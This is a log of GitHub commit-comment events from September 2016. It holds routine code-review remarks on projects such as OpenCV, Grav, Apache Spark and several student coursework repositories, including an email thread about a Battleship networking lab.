{"id":"4580948234","type":"CommitCommentEvent","actor":{"login":"tomoaki0705"},"repo":{"name":"opencv/opencv"},"payload":{"comment":{"id":19072814,"position":9,"line":153,"path":"cmake/OpenCVCompilerOptions.cmake","commit_id":"b2ad7cd9c018d9acf5e319e3f6a99651c0dca244","created_at":"2016-09-19T00:47:54Z","updated_at":"2016-09-19T00:47:54Z","body":"Sorry, so did you manage to build correctly, or are you suggesting some fix ?\r\n\r\nIf you have a look at [some log from build machine]( http://pullrequest.opencv.org/buildbot/builders/precommit_ios/builds/3355/steps/build%20framework/logs/stdio ), you can see that there is no ```clang: error: the clang compiler does not support '-mfpu=neon-fp16'``` error showing up.\r\nIt means something went wrong in your environment.\r\nPlease have a look at [docs](http://docs.opencv.org/ref/master/) or [tutorials](http://docs.opencv.org/2.4/doc/tutorials/tutorials.html) and figure out what's wrong.\r\nI don't have neither MacOS or iOS build environment, so I assume I have nothing I could help you."}},"created_at":"2016-09-19T00:47:54Z"}
{"id":"4580949791","type":"CommitCommentEvent","actor":{"login":"Mischanix"},"repo":{"name":"ocornut/imgui"},"payload":{"comment":{"id":19072815,"position":null,"line":null,"path":null,"commit_id":"86666489df97d40edef64196db43963cd0ba335f","created_at":"2016-09-19T00:49:05Z","updated_at":"2016-09-19T00:49:05Z","body":"The same calculation of char_width in CalcWordWrapPositionA is missing this change.  Is that a bug?"}},"created_at":"2016-09-19T00:49:05Z"}
{"id":"4580951565","type":"CommitCommentEvent","actor":{"login":"civilizeddev"},"repo":{"name":"civilizeddev/blog"},"payload":{"comment":{"id":19072818,"position":null,"line":null,"path":null,"commit_id":"368ab3d5e9517c83ffdb916d431e438729339da2","created_at":"2016-09-19T00:50:23Z","updated_at":"2016-09-19T00:50:23Z","body":"젠킨스를 사용해본 경험과 느낌을 넣어보면 좋겠다."}},"created_at":"2016-09-19T00:50:23Z"}
{"id":"4580955454","type":"CommitCommentEvent","actor":{"login":"StackableRegiments"},"repo":{"name":"StackableRegiments/analyticalmetlx"},"payload":{"comment":{"id":19072828,"position":null,"line":null,"path":null,"commit_id":"f24a183b74f1ef50d8a30a079f00ad0c18a1e80a","created_at":"2016-09-19T00:53:18Z","updated_at":"2016-09-19T00:53:18Z","body":"Seems logical."}},"created_at":"2016-09-19T00:53:18Z"}
{"id":"4580956710","type":"CommitCommentEvent","actor":{"login":"androidhan"},"repo":{"name":"androidhan/-"},"payload":{"comment":{"id":19072829,"position":null,"line":null,"path":null,"commit_id":"af4e7cdd3268c4ad8c3e53c08cb60b71b6196f28","created_at":"2016-09-19T00:54:10Z","updated_at":"2016-09-19T00:54:10Z","body":"测试性的提交git"}},"created_at":"2016-09-19T00:54:10Z"}
{"id":"4580957974","type":"CommitCommentEvent","actor":{"login":"StackableRegiments"},"repo":{"name":"StackableRegiments/analyticalmetlx"},"payload":{"comment":{"id":19072832,"position":null,"line":null,"path":null,"commit_id":"f24a183b74f1ef50d8a30a079f00ad0c18a1e80a","created_at":"2016-09-19T00:55:06Z","updated_at":"2016-09-19T00:55:06Z","body":"Approved."}},"created_at":"2016-09-19T00:55:06Z"}
{"id":"4580959766","type":"CommitCommentEvent","actor":{"login":"ishitatsuyuki"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19072836,"position":null,"line":null,"path":null,"commit_id":"92287287fbb0773147a15125a7fb284c2518b962","created_at":"2016-09-19T00:56:14Z","updated_at":"2016-09-19T00:56:14Z","body":"What's wrong with my impl?"}},"created_at":"2016-09-19T00:56:14Z"}
{"id":"4580960486","type":"CommitCommentEvent","actor":{"login":"calaway"},"repo":{"name":"bfpepper/little-shop"},"payload":{"comment":{"id":19072839,"position":null,"line":null,"path":null,"commit_id":"117f4e1bf2095f24b6c511ceaebcb311e574e224","created_at":"2016-09-19T00:56:45Z","updated_at":"2016-09-19T00:56:45Z","body":"Order items are now loading at checkout. I'm working to see if I can get it to return a boolean to the controller to indicate a success or failure."}},"created_at":"2016-09-19T00:56:45Z"}
{"id":"4580964502","type":"CommitCommentEvent","actor":{"login":"saidinesh5"},"repo":{"name":"saidinesh5/android_kernel_xiaomi_cancro"},"payload":{"comment":{"id":19072851,"position":null,"line":null,"path":null,"commit_id":"feccb4886bc8db2a587dc5ddbec9a88dbf7b55c6","created_at":"2016-09-19T00:59:29Z","updated_at":"2016-09-19T00:59:29Z","body":"Yeah.. helps keep track of changes too, when you need to find more information about where things came from."}},"created_at":"2016-09-19T00:59:29Z"}
{"id":"4580965922","type":"CommitCommentEvent","actor":{"login":"rhukster"},"repo":{"name":"getgrav/grav"},"payload":{"comment":{"id":19072856,"position":5,"line":133,"path":"system/config/system.yaml","commit_id":"4f422fb2f6e59f08455746a4346e4ab35cc79a0e","created_at":"2016-09-19T01:00:25Z","updated_at":"2016-09-19T01:00:25Z","body":"Might be best to have `verify_peer: true` by default, and just recommend trying false if you have GPM issues (in docs)."}},"created_at":"2016-09-19T01:00:25Z"}
{"id":"4580966468","type":"CommitCommentEvent","actor":{"login":"MehdiDolati"},"repo":{"name":"MehdiDolati/CourseraAngularJS"},"payload":{"comment":{"id":19072857,"position":null,"line":null,"path":null,"commit_id":"30bc95bfcfa4042cd67161068828579ec9713574","created_at":"2016-09-19T01:00:47Z","updated_at":"2016-09-19T01:00:47Z","body":"test"}},"created_at":"2016-09-19T01:00:47Z"}
{"id":"4580968393","type":"CommitCommentEvent","actor":{"login":"MehdiDolati"},"repo":{"name":"MehdiDolati/CourseraAngularJS"},"payload":{"comment":{"id":19072861,"position":null,"line":null,"path":null,"commit_id":"ce7c022efe28effb9c638044afff9ca81f34fd08","created_at":"2016-09-19T01:02:07Z","updated_at":"2016-09-19T01:02:07Z","body":"test"}},"created_at":"2016-09-19T01:02:07Z"}
{"id":"4580969950","type":"CommitCommentEvent","actor":{"login":"ethancrawford"},"repo":{"name":"agworld/bootstrap-sass"},"payload":{"comment":{"id":19072865,"position":null,"line":null,"path":null,"commit_id":"e06543be0a1c3ee593a26af7c0106d50d7fc50bd","created_at":"2016-09-19T01:02:34Z","updated_at":"2016-09-19T01:02:34Z","body":"👍 "}},"created_at":"2016-09-19T01:02:34Z"}
{"id":"4580971254","type":"CommitCommentEvent","actor":{"login":"CuriousTech"},"repo":{"name":"CuriousTech/ESP8266-HVAC"},"payload":{"comment":{"id":19072867,"position":4,"line":793,"path":"Arduino/pages.h","commit_id":"6789ff66fe41125c3f181fea56d8adfa338932e9","created_at":"2016-09-19T01:03:28Z","updated_at":"2016-09-19T01:03:28Z","body":"The handleChart code inserts a chunk removed from chart.html at \"tb=\" now() - (26 hours) plus that \"data=\" line (to reduce a few characters) so it comes out as:\r\ntb=1474153084\r\ndata = { values:[\r\n{t:93600,temp:\"87.5\",rh:\"50.4\",h:\"88.1\",l:\"85.7\",s:0,f:0},\r\n...."}},"created_at":"2016-09-19T01:03:28Z"}
{"id":"4580972819","type":"CommitCommentEvent","actor":{"login":"gfsoileau"},"repo":{"name":"sharms9/dsp"},"payload":{"comment":{"id":19072872,"position":null,"line":null,"path":null,"commit_id":"95eb0e7cd76648f7923af0d0d7f03523df2f28ef","created_at":"2016-09-19T01:04:32Z","updated_at":"2016-09-19T01:04:32Z","body":"Hey Swati,\r\nNice work on the python assignment 👍 . A few items I would like to point out is that tuples are faster than lists. When completing the exercises, pls note the difference between print and return in the instructions, for example:\r\ndef fix_start(s):\r\n    return s[0]+s[1:].replace(s[0],\"*\")\r\n\r\n\r\n"}},"created_at":"2016-09-19T01:04:32Z"}
{"id":"4580975399","type":"CommitCommentEvent","actor":{"login":"mjfriedmann"},"repo":{"name":"jeffkiderman/tuitiontool"},"payload":{"comment":{"id":19072880,"position":11,"line":46,"path":"app/public/js/SchoolScripts.js","commit_id":"ae27159ecf6647da0809b89ac0c0a4d1ace9afa8","created_at":"2016-09-19T01:06:19Z","updated_at":"2016-09-19T01:06:19Z","body":"@jeffkiderman \r\nthese modifications feel like UI, not data.  imo, it belongs in the rendering logic (eg. react components), not in the data layer ('schoolscripts')\r\n\r\nwe don't have to do everything by the book in this project.  just giving you my intuition"}},"created_at":"2016-09-19T01:06:19Z"}
{"id":"4580976140","type":"CommitCommentEvent","actor":{"login":"mjfriedmann"},"repo":{"name":"jeffkiderman/tuitiontool"},"payload":{"comment":{"id":19072883,"position":6,"line":41,"path":"package.json","commit_id":"ae27159ecf6647da0809b89ac0c0a4d1ace9afa8","created_at":"2016-09-19T01:06:52Z","updated_at":"2016-09-19T01:06:52Z","body":"hm, we probably still want react? "}},"created_at":"2016-09-19T01:06:52Z"}
{"id":"4580976318","type":"CommitCommentEvent","actor":{"login":"mjfriedmann"},"repo":{"name":"jeffkiderman/tuitiontool"},"payload":{"comment":{"id":19072885,"position":null,"line":null,"path":null,"commit_id":"ae27159ecf6647da0809b89ac0c0a4d1ace9afa8","created_at":"2016-09-19T01:07:01Z","updated_at":"2016-09-19T01:07:01Z","body":"couple of inlines"}},"created_at":"2016-09-19T01:07:01Z"}
{"id":"4580978445","type":"CommitCommentEvent","actor":{"login":"alourie"},"repo":{"name":"instaclustr/zeppelin"},"payload":{"comment":{"id":19072891,"position":98,"line":334,"path":"cassandra/src/main/java/org/apache/zeppelin/cassandra/CassandraInterpreter.java","commit_id":"df82ecc8a2d181d9f92dca81357b4400a8c7ba58","created_at":"2016-09-19T01:08:31Z","updated_at":"2016-09-19T01:08:31Z","body":"is .build() here necessary?"}},"created_at":"2016-09-19T01:08:31Z"}
{"id":"4580978977","type":"CommitCommentEvent","actor":{"login":"alourie"},"repo":{"name":"instaclustr/zeppelin"},"payload":{"comment":{"id":19072892,"position":null,"line":null,"path":null,"commit_id":"df82ecc8a2d181d9f92dca81357b4400a8c7ba58","created_at":"2016-09-19T01:08:55Z","updated_at":"2016-09-19T01:08:55Z","body":"small comment, otherwise lgtm"}},"created_at":"2016-09-19T01:08:55Z"}
{"id":"4580979098","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19072893,"position":null,"line":null,"path":null,"commit_id":"92287287fbb0773147a15125a7fb284c2518b962","created_at":"2016-09-19T01:09:00Z","updated_at":"2016-09-19T01:09:00Z","body":"It only reads the first packet from the batch"}},"created_at":"2016-09-19T01:09:00Z"}
{"id":"4580980466","type":"CommitCommentEvent","actor":{"login":"MehdiDolati"},"repo":{"name":"MehdiDolati/CourseraAngularJS"},"payload":{"comment":{"id":19072901,"position":null,"line":null,"path":null,"commit_id":"fa88f812719a0417163d04f89e6f2dc045fd6ef4","created_at":"2016-09-19T01:10:03Z","updated_at":"2016-09-19T01:10:03Z","body":"safd"}},"created_at":"2016-09-19T01:10:03Z"}
{"id":"4580983869","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"jieunpark119/First-Fewd-Repo"},"payload":{"comment":{"id":19072912,"position":52,"line":37,"path":"01/personal-website/index.html","commit_id":"c2818fd4e87c41697a83548b3416a99f72d511ca","created_at":"2016-09-19T01:12:19Z","updated_at":"2016-09-19T01:12:19Z","body":"Instead of an id, you should use classes for the \"title\" styles since you need it in multiple places. Remember you should only be using an id name once per element."}},"created_at":"2016-09-19T01:12:19Z"}
{"id":"4580985907","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"jieunpark119/First-Fewd-Repo"},"payload":{"comment":{"id":19072916,"position":34,"line":19,"path":"01/personal-website/index.html","commit_id":"c2818fd4e87c41697a83548b3416a99f72d511ca","created_at":"2016-09-19T01:13:41Z","updated_at":"2016-09-19T01:13:41Z","body":"You're missing the quotes around \"index.html\"."}},"created_at":"2016-09-19T01:13:41Z"}
{"id":"4580986197","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"jieunpark119/First-Fewd-Repo"},"payload":{"comment":{"id":19072918,"position":47,"line":32,"path":"01/personal-website/index.html","commit_id":"c2818fd4e87c41697a83548b3416a99f72d511ca","created_at":"2016-09-19T01:13:52Z","updated_at":"2016-09-19T01:13:52Z","body":"You're missing the quotes around \"portfolio.html\"."}},"created_at":"2016-09-19T01:13:52Z"}
{"id":"4580986507","type":"CommitCommentEvent","actor":{"login":"Emmanuel-Armstrong"},"repo":{"name":"dssquared/Networks_Lab1"},"payload":{"comment":{"id":19072919,"position":null,"line":null,"path":null,"commit_id":"7f5b3dc1ba8a89d303ffa5a927903a77492af920","created_at":"2016-09-19T01:14:05Z","updated_at":"2016-09-19T01:14:05Z","body":"Working on the read and update_board() methods now.  Doing some reading up\non the docs for http to make sure I fully understand the best way to\nreceive the coords and get the right responses\n\nOn Sun, Sep 18, 2016 at 3:08 PM, dssquared <notifications@github.com> wrote:\n\n> I don't think we will be able to use the socket library for http, I am\n> looking at a few http libraries but need learn how to use them,\n> experimenting now. Someone else can start working on the board maintenance\n> like read_board() or update_board() in the server.py. These methods will\n> receive a string or chars of x,y coords, read_board() can return a string\n> or char for hit miss or sunk to be passed to another method.\n>\n>\n> On Sun, Sep 18, 2016 at 2:26 PM, David Schwehr <dpschwehr@gmail.com>\n> wrote:\n>\n> > I got some syntax errors fixed in server.py and it will run, but with the\n> > while(1) infinite loop you have to go into the task manager to kill the\n> > process since you have to run it from the command line to send in\n> > arguments. We wont have to worry about it once the client stuff is more\n> > complete to where the client will close the connection and the server\n> wont\n> > get stuck in a loop.\n> >\n> >\n> > On Sun, Sep 18, 2016 at 2:23 PM, David Schwehr <dpschwehr@gmail.com>\n> > wrote:\n> >\n> >> I got the file reading to the 2d array working.......kinda. There is an\n> >> additional element on each row of the array to hold the new line char.\n> This\n> >> was the easiest without having to read a line from the text file, strip\n> the\n> >> /n, then change the string into chars, then put it in the array. Maybe\n> >> later use the numpy library to make this nicer? I just wanted to get it\n> >> working so we can move on and get more done. I left the variable for the\n> >> width at 10 so we can still use this to check for a shot out of bounds.\n> >>\n> >> On Sun, Sep 18, 2016 at 1:28 PM, David Schwehr <dpschwehr@gmail.com>\n> >> wrote:\n> >>\n> >>> I got reading the file and filling the array to work but I can't omitt\n> >>> the newline character. Supossedly there is a strip('/n') that should\n> work\n> >>> with reading a file line by line but we need to read char by char. If\n> you\n> >>> were able to leave out the /n than that is farther than I got.\n> >>>\n> >>> On Sun, Sep 18, 2016 at 1:24 PM, Emmanuel-Armstrong <\n> >>> notifications@github.com> wrote:\n> >>>\n> >>>> Oh crap I just realized, I've done some work on the file reading and\n> >>>> writing but I totally forgot to push it up to git! I'll see if I have\n> >>>> any\n> >>>> more than you and if so I'll push up what I have when I get home from\n> >>>> work\n> >>>> in a couple hours. Sorry about that!\n> >>>>\n> >>>>\n> >>>> On Sep 18, 2016 12:53 PM, \"dssquared\" <notifications@github.com>\n> wrote:\n> >>>>\n> >>>> > I've started working with reading in the board file and filling the\n> >>>> array,\n> >>>> > about half success now. Once the board array is filled we can start\n> >>>> working\n> >>>> > on the rest. Not sure if we want to make a nother text file for the\n> >>>> client\n> >>>> > to keep track of the board since the client is re-invoked each time.\n> >>>> Can't\n> >>>> > really use an array since the program is restarted each time but\n> >>>> writing to\n> >>>> > a file from an array could be a pain. I will finish the server side\n> >>>> > creating the board array first, might use a list within a list.\n> >>>> > What do you guys want to work on or feel comfortable about working\n> on?\n> >>>> >\n> >>>> > David\n> >>>> >\n> >>>> > On Sat, Sep 17, 2016 at 6:35 PM, David Schwehr <dpschwehr@gmail.com\n> >\n> >>>> > wrote:\n> >>>> >\n> >>>> > > Just checked, the address for localhost is correct, the port\n> >>>> numbers and\n> >>>> > > ip being set from command line arguments is already implemented\n> and\n> >>>> I\n> >>>> > > checked the connection already. I was going to play around with\n> >>>> different\n> >>>> > > ways of making the board and http stuff next. I put a board.txt\n> >>>> file in\n> >>>> > the\n> >>>> > > folder too to use to test reading the file and creating an array\n> or\n> >>>> list\n> >>>> > of\n> >>>> > > lists for the board.\n> >>>> > > Remember to git pull before working on anything to make sure you\n> >>>> have the\n> >>>> > > most recent version.\n> >>>> > > I will be working on it some tonight and spending most the day on\n> it\n> >>>> > > tomorrow.\n> >>>> > >\n> >>>> > > On Sat, Sep 17, 2016 at 6:30 PM, David Schwehr <\n> dpschwehr@gmail.com\n> >>>> >\n> >>>> > > wrote:\n> >>>> > >\n> >>>> > >> Right now the server is on 127.0.0.1( i may have the address\n> wrong\n> >>>> but\n> >>>> > it\n> >>>> > >> should be the address of localhost, which is the same no matter\n> >>>> what\n> >>>> > >> machine it is running on) just to run it on your local machine to\n> >>>> test,\n> >>>> > it\n> >>>> > >> will be changed to the ip address of the machine it is running on\n> >>>> when\n> >>>> > they\n> >>>> > >> grade it.\n> >>>> > >>\n> >>>> > >> On Sat, Sep 17, 2016 at 6:26 PM, David Schwehr <\n> >>>> dpschwehr@gmail.com>\n> >>>> > >> wrote:\n> >>>> > >>\n> >>>> > >>> It is getting the fire commands from the command line arguments,\n> >>>> that\n> >>>> > is\n> >>>> > >>> why the client is being invoked every play. The connection is\n> made\n> >>>> > with the\n> >>>> > >>> port number and IP address passed in from the command line\n> >>>> arguments. I\n> >>>> > >>> have already wrote the code for the connection using the socket\n> >>>> > library.\n> >>>> > >>> Thev ariables for the x and y coords passed from the command\n> line\n> >>>> are\n> >>>> > >>> working just as you had them in your test.py, I added it to the\n> >>>> > client.py\n> >>>> > >>> file already. These variable will be used in the methods that\n> >>>> send the\n> >>>> > http\n> >>>> > >>> message. The http and passing in the variable I think will be\n> the\n> >>>> easy\n> >>>> > >>> part, some of it is done and it works. The time consuming part\n> is\n> >>>> > going to\n> >>>> > >>> be writing the code to maintain the board and \"serving\" the\n> >>>> display of\n> >>>> > the\n> >>>> > >>> board.\n> >>>> > >>> Tracking sunk ships will work as you suggested and this will be\n> >>>> put in\n> >>>> > a\n> >>>> > >>> method called from read_board or process_reply or done inside of\n> >>>> > >>> process_reply.\n> >>>> > >>>\n> >>>> > >>> On Sat, Sep 17, 2016 at 6:10 PM, tyler-sassaman <\n> >>>> > >>> notifications@github.com> wrote:\n> >>>> > >>>\n> >>>> > >>>> I was thinking about tracking sunk ships. Just a thought, but\n> >>>> what if\n> >>>> > >>>> we had a global variable for each ship (carrier = 5), and every\n> >>>> time\n> >>>> > we hit\n> >>>> > >>>> that type of ship we decrement that value, and compare it to 0.\n> >>>> so if\n> >>>> > >>>> carrier gets to 0 then it has been hit 5 times which is the\n> same\n> >>>> > thing as\n> >>>> > >>>> being sunk.\n> >>>> > >>>>\n> >>>> > >>>> —\n> >>>> > >>>> You are receiving this because you authored the thread.\n> >>>> > >>>> Reply to this email directly, view it on GitHub\n> >>>> > >>>> <https://github.com/dssquared/Networks_Lab1/commit/\n> >>>> > 7f5b3dc1ba8a89d303ffa5a927903a77492af920#commitcomment-19068085>,\n> >>>> > >>>> or mute the thread\n> >>>> > >>>> <https://github.com/notifications/unsubscribe-auth/AE8DG_y6g\n> >>>> kDXIV5_\n> >>>> > YwVT263okb39zDjcks5qrIFygaJpZM4J_dYG>\n> >>>> > >>>> .\n> >>>> > >>>>\n> >>>> > >>>\n> >>>> > >>>\n> >>>> > >>\n> >>>> > >\n> >>>> >\n> >>>> > —\n> >>>> > You are receiving this because you commented.\n> >>>> > Reply to this email directly, view it on GitHub\n> >>>> > <https://github.com/dssquared/Networks_Lab1/commit/7f5b3dc1b\n> >>>> a8a89d303ffa5a927903a77492af920#commitcomment-19071806>,\n> >>>> > or mute the thread\n> >>>> > <https://github.com/notifications/unsubscribe-auth/ANiCOS9eO\n> >>>> _caF6oZivfhC4W6aceQXCnFks5qrYi_gaJpZM4J_dYG>\n> >>>>\n> >>>> > .\n> >>>> >\n> >>>>\n> >>>> —\n> >>>> You are receiving this because you authored the thread.\n> >>>> Reply to this email directly, view it on GitHub\n> >>>> <https://github.com/dssquared/Networks_Lab1/commit/\n> 7f5b3dc1ba8a89d303ffa5a927903a77492af920#commitcomment-19071958>,\n> >>>> or mute the thread\n> >>>> <https://github.com/notifications/unsubscribe-auth/\n> AE8DG5F6ycythOV16iTCINZqZXSNnY3Fks5qrZAFgaJpZM4J_dYG>\n> >>>> .\n> >>>>\n> >>>\n> >>>\n> >>\n> >\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/dssquared/Networks_Lab1/commit/7f5b3dc1ba8a89d303ffa5a927903a77492af920#commitcomment-19072275>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ANiCOcgGOv7D1uxZO5mlvcDpj0kmG9ODks5qragygaJpZM4J_dYG>\n> .\n>\n"}},"created_at":"2016-09-19T01:14:05Z"}
{"id":"4580986966","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"jieunpark119/First-Fewd-Repo"},"payload":{"comment":{"id":19072921,"position":26,"line":18,"path":"01/personal-website/portfolio.html","commit_id":"c2818fd4e87c41697a83548b3416a99f72d511ca","created_at":"2016-09-19T01:14:23Z","updated_at":"2016-09-19T01:14:23Z","body":"You're missing the quotes around \"portfolio.html\"."}},"created_at":"2016-09-19T01:14:23Z"}
{"id":"4580987369","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"jieunpark119/First-Fewd-Repo"},"payload":{"comment":{"id":19072922,"position":43,"line":35,"path":"01/personal-website/portfolio.html","commit_id":"c2818fd4e87c41697a83548b3416a99f72d511ca","created_at":"2016-09-19T01:14:39Z","updated_at":"2016-09-19T01:14:39Z","body":"You're missing the quotes around \"index.html\"."}},"created_at":"2016-09-19T01:14:39Z"}
{"id":"4580988305","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19072925,"position":null,"line":null,"path":null,"commit_id":"fb6a11ff08b9277e9f7a2fecae83027d3e0e60df","created_at":"2016-09-19T01:15:14Z","updated_at":"2016-09-19T01:15:14Z","body":"I was never able to track down the bad interaction. I tried to diff the preprocessed source files (`-E` instead of `-c`), but there were thousands of lines of differences between a \"good\" and a \"bad\".\r\n\r\nI talked to Wei about the issue. The functionality the library was providing through its own definition of the instrinsics was of marginal value in 2016. In contrast, they were of great value in 2006 or 2008, before all compilers provided them. The compilers being used back then were GCC 4.0.3 to about GCC 4.3.\r\n\r\nAlso see [Issue 206: GCC 4.8/4.9, -std=c++11 and \"error: expected ‘)’ before __builtin_ia32_pclmulqdq128\"](http://github.com/weidai11/cryptopp/issues/206)."}},"created_at":"2016-09-19T01:15:14Z"}
{"id":"4580989118","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"jieunpark119/First-Fewd-Repo"},"payload":{"comment":{"id":19072927,"position":39,"line":24,"path":"01/personal-website/index.html","commit_id":"c2818fd4e87c41697a83548b3416a99f72d511ca","created_at":"2016-09-19T01:15:48Z","updated_at":"2016-09-19T01:15:48Z","body":"Instead of a <br> tag here, I would use margin-bottom to add space in between the list items."}},"created_at":"2016-09-19T01:15:48Z"}
{"id":"4580989944","type":"CommitCommentEvent","actor":{"login":"carledriss"},"repo":{"name":"AT-01/pivotal-api-test1"},"payload":{"comment":{"id":19072929,"position":30,"line":34,"path":"src/main/java/org/fundacionjala/pivotaltracker/api/Environment.java","commit_id":"592e3de7b62892ef952a6c3913f808f8dbc085f8","created_at":"2016-09-19T01:16:23Z","updated_at":"2016-09-19T01:16:23Z","body":"Please add constants for the messages.\r\nAnd also you need to improve the try catch"}},"created_at":"2016-09-19T01:16:23Z"}
{"id":"4580991704","type":"CommitCommentEvent","actor":{"login":"ekivolowitz"},"repo":{"name":"UW-UPL/uw-upl.github.io"},"payload":{"comment":{"id":19072935,"position":null,"line":null,"path":null,"commit_id":"b93b7a396006b2cab09bfd1536327469116f6ee0","created_at":"2016-09-19T01:17:38Z","updated_at":"2016-09-19T01:17:38Z","body":"Do you have a couple of hours this coming weekend, to explain to a plebe how this site works?"}},"created_at":"2016-09-19T01:17:38Z"}
{"id":"4580995206","type":"CommitCommentEvent","actor":{"login":"gfsoileau"},"repo":{"name":"unif2/dsp"},"payload":{"comment":{"id":19072943,"position":null,"line":null,"path":null,"commit_id":"2e0f5c058087cbe92609f798e1362b81995f13f2","created_at":"2016-09-19T01:19:51Z","updated_at":"2016-09-19T01:19:51Z","body":"Hi Vince,\r\nGreat work with the python exercises 👍. Tuples are also faster and can act as constants, which are useful. Nice work using lambda functions. \r\n\r\nI am including an elegant solution to the linear merge exercise:\r\n\r\ndef linear_merge(list1, list2):\r\n    lst=list1+list2\r\n    lst.sort()\r\n    return lst"}},"created_at":"2016-09-19T01:19:51Z"}
{"id":"4580996850","type":"CommitCommentEvent","actor":{"login":"carledriss"},"repo":{"name":"AT-01/pivotal-api-test1"},"payload":{"comment":{"id":19072947,"position":78,"line":75,"path":"src/main/java/org/fundacionjala/pivotaltracker/api/RequestManager.java","commit_id":"cb77021a7a4aa4efd8b0aba76ca09c92385c07e0","created_at":"2016-09-19T01:20:51Z","updated_at":"2016-09-19T01:20:51Z","body":"@AT-01/team1 \r\nCan you change this by .contentType(ContentType.JSON) ?"}},"created_at":"2016-09-19T01:20:51Z"}
{"id":"4581002055","type":"CommitCommentEvent","actor":{"login":"witgo"},"repo":{"name":"apache/spark"},"payload":{"comment":{"id":19072960,"position":163,"line":811,"path":"core/src/main/scala/org/apache/spark/storage/memory/MemoryStore.scala","commit_id":"8faa5217b44e8d52eab7eb2d53d0652abaaf43cd","created_at":"2016-09-19T01:23:51Z","updated_at":"2016-09-19T01:23:51Z","body":"fileOutputStream may be closed twice?"}},"created_at":"2016-09-19T01:23:51Z"}
{"id":"4581003875","type":"CommitCommentEvent","actor":{"login":"alecthegeek"},"repo":{"name":"PaperCutSoftware/PaperCutExamples"},"payload":{"comment":{"id":19072969,"position":null,"line":null,"path":null,"commit_id":"f03f2468c73d6105b93f58fca53d6fca747f382f","created_at":"2016-09-19T01:25:05Z","updated_at":"2016-09-19T01:25:05Z","body":"As a user I don't understand why I would want this? What's it trying to do? What is PRTG? (I did look on their website but that talked about a network monitoring tool so that didn't help).\r\n\r\nThanks"}},"created_at":"2016-09-19T01:25:05Z"}
{"id":"4581004979","type":"CommitCommentEvent","actor":{"login":"alourie"},"repo":{"name":"instaclustr/spark-cassandra-connector"},"payload":{"comment":{"id":19072971,"position":null,"line":null,"path":null,"commit_id":"495c0aff12bcc432b89b6e17e361644a748e0d81","created_at":"2016-09-19T01:25:41Z","updated_at":"2016-09-19T01:25:41Z","body":"👍 "}},"created_at":"2016-09-19T01:25:41Z"}
{"id":"4581005990","type":"CommitCommentEvent","actor":{"login":"xning"},"repo":{"name":"procszoo/procszoo"},"payload":{"comment":{"id":19072972,"position":null,"line":null,"path":null,"commit_id":"b25fbf08a7d1488a1bc3098f7f9187a0382bf164","created_at":"2016-09-19T01:26:14Z","updated_at":"2016-09-19T01:26:14Z","body":"Seems the directory name *ipc* does not make sense. Perhaps we need a more obvious name."}},"created_at":"2016-09-19T01:26:14Z"}
{"id":"4581006662","type":"CommitCommentEvent","actor":{"login":"carledriss"},"repo":{"name":"AT-01/pivotal-api-test1"},"payload":{"comment":{"id":19072974,"position":22,"line":22,"path":"src/test/java/org/fundacionjala/pivotaltracker/hooks/ProjectHooks.java","commit_id":"78467ad440aa58e28dc49d3008f2512a48adb2ab","created_at":"2016-09-19T01:26:40Z","updated_at":"2016-09-19T01:26:40Z","body":"This should be private"}},"created_at":"2016-09-19T01:26:40Z"}
{"id":"4581006781","type":"CommitCommentEvent","actor":{"login":"carledriss"},"repo":{"name":"AT-01/pivotal-api-test1"},"payload":{"comment":{"id":19072976,"position":23,"line":23,"path":"src/test/java/org/fundacionjala/pivotaltracker/hooks/ProjectHooks.java","commit_id":"78467ad440aa58e28dc49d3008f2512a48adb2ab","created_at":"2016-09-19T01:26:45Z","updated_at":"2016-09-19T01:26:45Z","body":"This should be private"}},"created_at":"2016-09-19T01:26:45Z"}
{"id":"4581007828","type":"CommitCommentEvent","actor":{"login":"alourie"},"repo":{"name":"instaclustr/spark-cassandra-connector"},"payload":{"comment":{"id":19072980,"position":null,"line":null,"path":null,"commit_id":"98b389c2c5fd037f5407e99deec0be39eea07a53","created_at":"2016-09-19T01:27:24Z","updated_at":"2016-09-19T01:27:24Z","body":"I can't see what changed, so 👍 "}},"created_at":"2016-09-19T01:27:24Z"}
{"id":"4581008232","type":"CommitCommentEvent","actor":{"login":"w00fz"},"repo":{"name":"getgrav/grav"},"payload":{"comment":{"id":19072982,"position":5,"line":133,"path":"system/config/system.yaml","commit_id":"4f422fb2f6e59f08455746a4346e4ab35cc79a0e","created_at":"2016-09-19T01:27:42Z","updated_at":"2016-09-19T01:27:42Z","body":"Oops yah that's how I have it to fallback below, I pushed my test case without reverting it good catch."}},"created_at":"2016-09-19T01:27:42Z"}
{"id":"4581008278","type":"CommitCommentEvent","actor":{"login":"jlniouky"},"repo":{"name":"jlniouky/coursera-courses"},"payload":{"comment":{"id":19072983,"position":null,"line":null,"path":null,"commit_id":"4bc0346c8c0488e074cc5874ed26dda6a1fcbede","created_at":"2016-09-19T01:27:43Z","updated_at":"2016-09-19T01:27:43Z","body":"error"}},"created_at":"2016-09-19T01:27:43Z"}
{"id":"4581009089","type":"CommitCommentEvent","actor":{"login":"xning"},"repo":{"name":"procszoo/procszoo"},"payload":{"comment":{"id":19072986,"position":null,"line":null,"path":null,"commit_id":"b25fbf08a7d1488a1bc3098f7f9187a0382bf164","created_at":"2016-09-19T01:28:14Z","updated_at":"2016-09-19T01:28:14Z","body":"Will review and try your code soon."}},"created_at":"2016-09-19T01:28:14Z"}
